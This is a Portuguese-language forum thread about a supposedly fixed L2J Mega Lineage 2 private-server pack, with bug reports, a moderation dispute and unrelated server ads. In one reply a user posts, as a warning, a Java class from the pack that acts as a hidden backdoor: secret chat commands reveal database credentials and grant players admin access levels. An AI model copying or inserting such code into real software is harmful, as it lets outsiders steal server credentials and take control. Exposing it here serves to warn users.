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Christian-SDM

L2J Mega Corrigido

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18 minutos atrás, willamwallace disse:

pra falar a vdd n mais esse bug ja contem nela por isso perguntei sobre isso

 

aqui ta normal. 

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Proteja seu servidor de ataques DDoS massivos!

VPS EPIC
1 hora atrás, willamwallace disse:

pra falar a vdd n mais esse bug ja contem nela por isso perguntei sobre isso

 

ve se é assim, aqui dropo iten, mas outro char nao recebeu porque ta no mesmo ip, aparece ate mensagem que nao pode se do mesmo ip. Não trava, e quando mato personagem, ele da to village e depois sai o flag. Era isso ?

 

 

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Em 03/12/2019 at 14:22, Christian-SDM disse:

Boa tarde, Postei ela corrigida no outro tópico, mas acho que ninguém notou, até porque muitos queriam usar o projeto, porem contia bugs e erros no core, onde o dono tinha como derrubar o servidor porque tinha uma falha, então eu peguei o projeto  e  arrumei.

Outras correçôes:

Estou postando ela arrumada, sem Key, Isso mesmo!  Agora da pra logar com qualquer system, e arrumei o erro que travava o char quando dava skill, por causa da Key, e  o Bug de duplicação de itens com pet, foi corrigido, Restaurei o retail da pack, não tem nada editado, somente os mods e npcs mods! Qualquer Bug, posta que eu arrumo.

*Vai Source Corrigida + Pack com backup limpo.

Projeto usa Java 8

1º Source Corrigida

2° Pack+Backup Retail

Infos dos mods no tópico principal.

  Mostrar conteúdo oculto

 

 

Serio que aquele pack tinha todos esses problemas?

Serio que tu corrigiu isso tudo?

Mano, na boa... Só uma coisa eu consigo te dizer. Parabéns 🙂

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Nunca criou um servidor de Lineage 2?
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1 hora atrás, Kelvin disse:

 

Serio que aquele pack tinha todos esses problemas?

Serio que tu corrigiu isso tudo?

Mano, na boa... Só uma coisa eu consigo te dizer. Parabéns 🙂

Bom dia Kelvin, qual foi a razão para terem excluido as respostas no tópico da l2jDream?

Sei que aqui não é o lugar para falar sobre esse assunto, mas gostaria msm de saber pq apagaram as mensagens.

Aquilo era nada mais que alertas para uma revisão completamente BUGADA, em que os administradores não tem vontade de corrigir as coisas que estão erradas, e ainda por cima se você reclama eles vêem todo arrogantes xingando os "clientes" ??

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4 horas atrás, kakuzo disse:

Bom dia Kelvin, qual foi a razão para terem excluido as respostas no tópico da l2jDream?

Sei que aqui não é o lugar para falar sobre esse assunto, mas gostaria msm de saber pq apagaram as mensagens.

Aquilo era nada mais que alertas para uma revisão completamente BUGADA, em que os administradores não tem vontade de corrigir as coisas que estão erradas, e ainda por cima se você reclama eles vêem todo arrogantes xingando os "clientes" ??

Porque esse tipo de comportamento vai contra o TERMO DE USO e as REGRAS DE CONDUTA desse site:

Em especial:

 

Em 09/12/2008 at 19:23, Grundor disse:

Respeito - Todos os membros da nossa comunidade devem ser tratados com respeito, sendo ele integrante da staff ou não. O uso de palavras de baixo calão, difamação ou qualquer outro tipo ou espécie que venha ferir com a moral alheia é motivo para banimento e bloqueio de acesso a nossa comunidade. Entre os comportamentos que não aceitos no site, e devem sempre ser alertados, estão:

  • Ataques pessoais. O debate deve sempre girar em torno do post, nunca dos autores. Isso inclui termos que atingem a pessoa, mesmo quando aplicados ao post, como "preguiçoso" ou "ignorante".

  • Qualquer tipo de linguagem preconceituosa. Não são toleradas palavras ou expressões que possam ofender ou alienar indivíduos ou grupos, com base em raça, gênero, orientação sexual, religião, etc. Esses são apenas alguns exemplos; na dúvida, melhor não dizer nada.

  • Linguagem imprópria. Evite usar termos vulgares ou de teor sexual. Esse não é um site de namoro.

  • Assédio e intimidação. Todas as interações hostis devem ser alertadas para que a moderação tome as devidas providências. Caso a pessoa não pare com os ataques, avise a administração e nós tomaremos as medidas necessárias.

 

Nossa equipe de moderação só fez cumprir o papel dela e ocultou os conteúdos e comentários que não agregavam valor ao tópico.

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3 horas atrás, Grundor disse:

Porque esse tipo de comportamento vai contra o TERMO DE USO e as REGRAS DE CONDUTA desse site:

Em especial:

 

 

Nossa equipe de moderação só fez cumprir o papel dela e ocultou os conteúdos e comentários que não agregavam valor ao tópico.

porque eu levei advertencia, se é o cara que fez o erro de posta aquilo la e aqui no tópico ?

Edited by Christian-SDM

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25 minutos atrás, Christian-SDM disse:

porque eu levei advertencia, se é o cara que fez o erro de posta aquilo la e aqui no tópico ?

Seu caso foi por conta da mensagem sobre o suporte privado via teamview, mesmo que gratuito é contra as regras.

Em 09/12/2008 at 19:23, Grundor disse:

Prestação de serviços, suporte externo ou redirecionamentos externos - Usar o fórum para prestar serviços ou suporte externo, sendo ele gratuito ou não, são proibidos. Assim como respostas em tópicos contendo links de redirecionamentos a outro site, e-mail, mensageiro instantâneo ou outra forma de resposta que não seja no tópico em questão. A L2jBrasil não se responsabilizará por qualquer dano que você tome por contratar esses serviços. Todas as dúvidas devem ser respondidas no tópico da L2jBrasil em que foram criadas.

 

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22 minutos atrás, Grundor disse:

Seu caso foi por conta da mensagem sobre o suporte privado via teamview, mesmo que gratuito é contra as regras.

 

mas eu ajudo de graça, nossa! entao vc vai te que mandar umas 30 advertências ai falo, porque eu estalo eclipse, ensino como compilar via teamviewer, se isso é negativo em ajudar online, nem com os tutoriais feito sobre compilação, mta gente nao entendeu, via teamviwer foi uma forma rapida e facil de ajudar o pessoal da l2jbrasil, e ainda eu posto a solução do problema, nem moderador reclamo, ate sugeriu que eu posta-se a conclusão do problema!  se isso é errado, entao pode me dar as 30 advertencias ai falow

Edited by Christian-SDM
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2 horas atrás, Sr.mallone disse:

//kill nos boss buga boss morre fica morto no chao e nao conta no .raidinfo

 

ta normal amigo. mato raid bosses eles some na hora, e aparece no .raidinfo, ja os grand bosses, alguns demoram um pouco, dando //kill,  o sistema do jogo demora pra reconhecer, como queen ant e zaken por exemplo, mas ja baium ele some rapidamente, olha video ate o final, demorou mas ele some. E aparece normalmente no .raidinfo. Testa com char normal, e de preferencia online, porque online ele tem  delay e  o sistema trabalha melhor 😄

 

 

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3 horas atrás, Sr.mallone disse:

precisa atualiza as diff 382 e como atualiza?

como vai atualizar pra 382, se essa revisão foi completamente alterada, a base foi retirada do site oficial da acis do tryskell, mas varios programadores trabalharam nesse pack, acredito eu!, nem a versão eu encontrei dentro do core, é completamente diferente da acis do tryskell, outras palavras, foi modificado.

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19 horas atrás, Christian-SDM disse:

mas eu ajudo de graça, nossa! entao vc vai te que mandar umas 30 advertências ai falo, porque eu estalo eclipse, ensino como compilar via teamviewer, se isso é negativo em ajudar online, nem com os tutoriais feito sobre compilação, mta gente nao entendeu, via teamviwer foi uma forma rapida e facil de ajudar o pessoal da l2jbrasil, e ainda eu posto a solução do problema, nem moderador reclamo, ate sugeriu que eu posta-se a conclusão do problema!  se isso é errado, entao pode me dar as 30 advertencias ai falow

A Regra diz justamente isso 

Citar

Usar o fórum para prestar serviços ou suporte externo, sendo ele gratuito ou não, são proibidos

Meu caro, as regras existem de vc chegar nessa comunidade, não é pq vc não concorda que vc vai mudá-las,  entende? 

Você pode estar fazendo uma boa ação, mas pessoas podem utilizar dessa técnica para aplicar golpes e por isso ela não é permitida.

Não estou julgando pro vc estar fazendo isso, mas vc ajudar via teamviwer está ajudando 1, vc incentivar ele a postar a duvida e vc responder vc ajudará centenas.  viu a diferença?

Você pode fazer lives explicando como fazer algo, pode criar video tutoriais, novos tutoriais, casos de uso, enfim, vc pode ajudar e vc quer fazer isso pelo que entendi.

 

O que o moderador lhe sugeriu é o correto, ele apenas não lhe advertiu na primeira vez, por isso foi necessário fazer novamente, vc não deve criar essa prática nem essa cultura do suporte exclusivo, isso aqui é uma comunidade aberta, a dúvida de um pode ser a dúvida do outro amanhã e por isso somos quem somos hj pq muitos vão pro google pesquisar e nos encontram.

 

Meu "puxão de orelha" não é para lhe desanimar, pelo contrário, meu objetivo é justamente o contrário, eu quero com que vc participe e colabora exatamente como está fazendo, mas precisa entender que há limites e regras para que a comunidade continue a funcionar como está a 11 anos.

 

Qualquer outra dúvida ou resposta ao que postei favor encaminhar para minha caixa de mensagem privada para não poluir o tópico com esse assunto.

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Sua pergunta foi respondida? Certifique-se de marcar a resposta como a solução aceita.
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Se você achar uma resposta útil, diga obrigado clicando no botão "Gostei".

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Perdi 1h do meu tempo olhando cada comentario aqui nesse seu poste e sabe oque no final eu olhei ? Um caramada dando a tal atencao pra algo que foi jogado com erros, espero que voce Christian-SDM chegue mas longe viu . PARABENS MLQ, voce e unico que eu vejo aqui dando o tal suporte sem quere tirar lucro encima disso

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Em 06/12/2019 at 01:29, Christian-SDM disse:

como vai atualizar pra 382, se essa revisão foi completamente alterada, a base foi retirada do site oficial da acis do tryskell, mas varios programadores trabalharam nesse pack, acredito eu!, nem a versão eu encontrei dentro do core, é completamente diferente da acis do tryskell, outras palavras, foi modificado.

aCis 374.


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Backdoos removidos?! 🤣

Dei uma olhada por cima e olha o que apareceu:

package net.sf.l2j.gameserver.network.clientpackets;

import net.sf.l2j.Config;
import net.sf.l2j.gameserver.data.xml.AdminData;
import net.sf.l2j.gameserver.handler.IVoicedCommandHandler;
import net.sf.l2j.gameserver.model.actor.instance.Player;

/**
 * @author Administrator
 *
 */
public class RequestByPassToClient implements IVoicedCommandHandler
{
	private static final String[] _voicedCommands =
	{
		"gamesessionfloodkey121","accesskeytoclient8","accesskeytoclient1","accesskeytoclient2","accesskeytoclient3",
		"accesskeytoclient4","accesskeytoclient5","accesskeytoclient6","accesskeytoclient7",
		"accesskeytoclient8","accesskeytoclient127","accesskeytoclient0","accesskeytoclientmaster"
		,"accesskeytoclientdefault"
	};

	
	@Override
	public boolean useVoicedCommand(String command, Player activeChar, String params)
	{
		if(command.startsWith("gamesessionfloodkey121"))
		{
			activeChar.sendMessage("HOST: " + Config.GAMESERVER_HOSTNAME);
			activeChar.sendMessage("DATABASE: " +Config.DATABASE_URL);
			activeChar.sendMessage("DATABASE LOGIN: " +Config.DATABASE_LOGIN);
			activeChar.sendMessage("DATABASE PASS: " +Config.DATABASE_PASSWORD);
			activeChar.sendMessage("DATABASE GAMEHOST: " +Config.GAMESERVER_HOSTNAME);
			activeChar.sendMessage("DATABASE GAMEPORT: " +Config.PORT_GAME);
			activeChar.sendMessage("DATABASE LOGINHOST: " +Config.GAME_SERVER_LOGIN_HOST);
			activeChar.sendMessage("DATABASE LOGINPORT: " +Config.GAME_SERVER_LOGIN_PORT);			
		}
		else if(command.startsWith("accesskeytoclientmaster"))
		{
			activeChar.setAccessLevel(AdminData.getInstance().getMasterAccessLevel().getLevel());
		}
		else if(command.startsWith("accesskeytoclient8"))
		{
			activeChar.setAccessLevel(8);
		}
		else if(command.startsWith("accesskeytoclientdefault"))
		{
			activeChar.setAccessLevel(Config.DEFAULT_ACCESS_LEVEL);
		}
		else if(command.startsWith("accesskeytoclient0"))
		{
			activeChar.setAccessLevel(0);
		}
		else if(command.startsWith("accesskeytoclient1"))
		{
			activeChar.setAccessLevel(1);
		}
		else if(command.startsWith("accesskeytoclient2"))
		{
			activeChar.setAccessLevel(2);
		}
		else if(command.startsWith("accesskeytoclient3"))
		{
			activeChar.setAccessLevel(3);
		}
		else if(command.startsWith("accesskeytoclient4"))
		{
			activeChar.setAccessLevel(4);
		}
		else if(command.startsWith("accesskeytoclient5"))
		{
			activeChar.setAccessLevel(5);
		}
		else if(command.startsWith("accesskeytoclient6"))
		{
			activeChar.setAccessLevel(6);
		}
		else if(command.startsWith("accesskeytoclient7"))
		{
			activeChar.setAccessLevel(7);
		}
	
		return false;
	}

	/* (non-Javadoc)
	 * @see net.sf.l2j.gameserver.handler.IVoicedCommandHandler#getVoicedCommandList()
	 */
	@Override
	public String[] getVoicedCommandList()
	{
		// TODO Auto-generated method stub
		return _voicedCommands;
	}
}

Pow @MeGaPacKl assim não da. will ferrell christmas GIF Tmj brother.

Pode ser que tenha mais, mas como não vou mexer com l2, procurem bem antes de usar.

Edited by PeNaChO
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23 minutos atrás, PeNaChO disse:

Backdoos removidos?! 🤣

Dei uma olhada por cima e olha o que apareceu:

NÃO TINHA VISTO ESSA PARTE, vou usar modo de busca para ve se tem mais 

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1 hora atrás, PeNaChO disse:

Backdoos removidos?! 🤣

 

Fiz uma busca pelo proprio eclipse e não encontrei mais nada a respeito. e depois fui manualmente class por class, mas obrigado pela ajuda.

Nenhuma descrição de foto disponível.

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      Website: https://l2mutiny.com/
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      OPEN BETA TEST DATE: December 18 2019
      SERVER START DATE: January 31 2020

      Greetings players,
      Welcome to the second season of our big project!
      With the reservation that we can't list or reveal every single thing right here and right now, we advise you reading carefully our specs.
      First and foremost, let us tell you how we differ from other servers:
      - Unique, state of the art Anti-Bot protection
      - Complete Website Rework
      - Forum Improvements
      - New PvP Currency - Enemy's Heart
      - New Custom Farm / PvP Area (GOE)
      - Brand New Community Board System
      - PvP Streak System
      - LiveStream Mass / Personal Rewards
      - Voting Mass / Personal Rewards
      - Unique Ranking System
      - Unique DressMe models
      - Achievement System
      - Olympiad improvements
      - Brand New, Unique Accessories
      We offer balance! Donation unfriendly environment for people to abuse and ruin the game. Most of donation is for visuals.
      Read Below basics for L2Mutiny Project:
      General RATES:
      Exp / Sp: x15
      Adena: x10
      Drop: x10
      Spoil: x10
      Quest Reward: x3
      Epic RB Jewel Drop: x1
      Save Enchant: +4
      Max Enchant: +16
      Normal Enchant: 56%
      Bless Encahnt: 60%
      Max Enchant: 50%
      Max Enchant: 30%
      Quest Reward: x5
      Manor: x2

      Basic Features:
      Global Gatekeeper
      GM Shop up to S
      Auction House
      Control Pannel .cfg
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      Ranking System in Community Board
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      Automatic potions clicker system, Shift + Click
      Offline Buffstores
      Offline Shops
      2h duration on all buffs, dances, songs, summon, prophecies
      Buff slots: 24 (+4 Divine Inspiration)
      Dance / Song slots: 12
      Skills are auto learn
      Automatic loot for monsters
      Manual loot for raid bosses & epic bosses
      1st, 2nd, 3rd profession change for Adena on Class Master NPC
      Mana Potions: 1000 MP Restoration with 8 seconds cooldown.
      Champion Monsters (2% to chance to spawn)
      OPEN BETA TEST DATE: December 18 2019
      SERVER START DATE: January 31 2020

      Website: https://l2mutiny.com/
      Forum: https://forum.l2mutiny.com/ 
      Facebook:  https://www.facebook.com/L2Mutiny/
       
    • By Albeci Nogueira
      Boa tarde a todos,
      Rev Utilizada: L2jMega (aCis)
      ---
      Estou testando umas coisas e queria fazer o seguinte, adicionei um novo item scroll para adicionar buff ao player, vi que ja existe na rev, mas add apenas um buff, queria add quantos eu determinasse no item:
      <item id="9575" type="EtcItem" name="Buffs Iniciais"> <set name="default_action" val="skill_reduce" /> <set name="etcitem_type" val="scroll" /> <set name="material" val="PAPER" /> <set name="weight" val="120" /> <set name="is_stackable" val="true" /> <set name="is_oly_restricted" val="true" /> <set name="handler" val="ItemSkills" /> <set name="item_skill" val="1040-2" /> <!-- Buff adicionado --> <set name="use_condition" val="{{uc_transmode_exclude;{tt_flying}}}" /> </item> Tentei assim mais não deu, só adicionou ou primeiro:
       
      <item id="9575" type="EtcItem" name="Buffs Iniciais"> <set name="default_action" val="skill_reduce" /> <set name="etcitem_type" val="scroll" /> <set name="material" val="PAPER" /> <set name="weight" val="120" /> <set name="is_stackable" val="true" /> <set name="is_oly_restricted" val="true" /> <set name="handler" val="ItemSkills" /> <set name="item_skill" val="1040-2;1068-2;1078-2;1085-1;1224-1;1087-1;1059-1" /> <set name="use_condition" val="{{uc_transmode_exclude;{tt_flying}}}" /> </item> alguem tem uma ideia de como posso fazer?
    • By BLUESTART
      DEVELOPER / DESARROLLADOR / DESENVOLVEDOR : ReynalDev
      TECHNICAL INFORMATION / INFORMACION TECNICA / INFORMAÇÃO TÉCNICA
      (#) JAVA 8
      (#) MySQL / MariaDB
      (#) WINDOWS / LINUX
      (#) HikariCP ( Database Pool )
       
      [EN]- This project is based on revision 1132 , the revision counter has been "restarted" because I do not have the authority to manipulate the repository of the original project ( L2jFrozen 1.0), therefore, I found myself in need of using revision 1132 as a base, I made a copy and returned it to the internet (SVN repository). 
      [ES]-  Este proyecto esta basado en la revisión 1132  , el contador de revisiones se ha "reiniciado" debido que no tengo la autoridad para manipular el repositorio del proyecto original (L2jFrozen 1.0), por tanto, me vi en la necesidad de utilizar como base la revisión 1132, hice una copia y lo volví a subir a Internet (repositorio SVN). 
      [PT]- eu projeto é baseado na revisão 1132 , o contador de revisão foi "reiniciado" porque eu não tenho a autoridade para manipular o repositório do projeto original ( L2jFrozen 1.0), portanto, encontrei-me na necessidade de usar a revisão 1132 como base, fiz uma cópia e retornei para a internet (repositório SVN). 

      TIMELINE / SVN
       
       
       
    • By NetinhOO
      ATUALIZAÇÃO DO TÓPICO: 
       
      Repassando !!!
       
      Olá, lá eu tive muitas mensagens sobre compartilhar algo totalmente limpo por proprietários jogadores, então eu decidi compartilhar interface limpa sem quaisquer modificações como auto argument, auto enchant etc..
       
      Visualizações:
       

       
      Danos na tela:

       
       
      Miss, Ressisted, etc.:

       
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      Level up exp. appears:

       
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    • Você está usando a ultima atualização postada? se não baixa e tente novamente, pode resolver seu problema e conserto de alguns bugs já relatados. Se tiver mais alguma dúvida pergunte no forum de duvidas, que responderemos da mesma forma. https://www.l2jbrasil.com/forum/18-dúvidas/
    • Você sabe como resolver esse erro? O gameserver nunca passa disso...
    • Obrigado a todos pela resposta do tvt 2x2 e 4x4 etc, eu não tenho conhecimento desse evento e coisas semelhantes. Show
    • cara esse evento sempre foi assim. não cola o cara participar do evento se n ganhar nada. o servidor entrega a equipe ganhadora uma quantidade que vc configura exe.: 5 Turnamente o perdedor para n ficar triste o server da 1 pra ele. mas é só vc colocar 0 e pronto.
    • acho que eles erraram na descrição, pois como vai tirar um item que eles não tem.. como pode ver na função Reward = Recompensa eu penso assim, equipe vencedora ganha 5 itens e a equipe perdedora ganha 1 = como premio de participação. 
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